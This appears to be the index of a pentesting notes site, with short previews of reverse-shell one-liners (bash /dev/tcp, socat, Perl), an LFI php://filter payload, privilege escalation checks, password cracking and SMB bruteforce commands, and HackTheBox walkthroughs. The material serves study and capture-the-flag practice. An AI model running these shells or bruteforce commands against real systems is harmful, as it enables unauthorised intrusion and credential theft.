Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Socat socat -d -d TCP4-LISTEN:443 STDOUT socat TCP4:<ip>:443 EXEC:/bin/bash Perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;s...
Local File Inclusion
PHP php://filter/convert.base64-encode/resource=<php file>
Linux Privilege Escalation
Tools LinPEAS Linux-exploit-suggester-2.pl User id whoami Services What programs are running as root? - ps aux | grep "^root" Are any passwords exposed? If so, are the password...
HackTheBox - Legacy
Enumeration Port Scan $ cat nmap/initial.nmap # Nmap 7.91 scan initiated Wed Feb 17 20:35:39 2021 as: nmap -sC -sV -oA nmap/initial 10.129.100.11 Nmap scan report for 10.129.100.11...
HackTheBox - Lame
Enumeration Port Scan $ nmap -sC -sV -oA nmap/initial 10.129.99.83 # Nmap 7.91 scan initiated Tue Feb 16 19:19:05 2021 as: nmap -sC -sV -oA nmap/initial 10.129.99.83 Nmap scan report for 10.129.9...
HackTheBox - Bashed
Enumeration Port Scan $ nmap -sC -sV -oA nmap/initial 10.129.96.217 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:00 EST Nmap scan report for 10.129.96.217 Host is up (0.079s latency)....
WordPress
Vulnerability Scan wpscan -u <url> Enumerate Users wpscan -u <url> --enumerate u
Password Cracking
Password Mutations for i in $(cat <pw file>); do echo $i; echo ${i}<year>; done hashcat --force --stdout <pw file> -r /usr/share/hashcat/rules/best64.rule hashcat --force --stdou...
Restricted Shell Escapes
Additional Resources: GTFOBins Spawning /bin/bash -p /bin/sh Copy cp /bin/bash . /bin/bash -p cp /bin/sh . /bin/sh python python -c 'i...
SMB
Standard Port: 445/tcp Connect smbclient -L <ip> Password Policy crackmapexec smb <ip> --pass-pol -u '' -p '' Password Bruteforce crackmapexec smb <ip> -u <...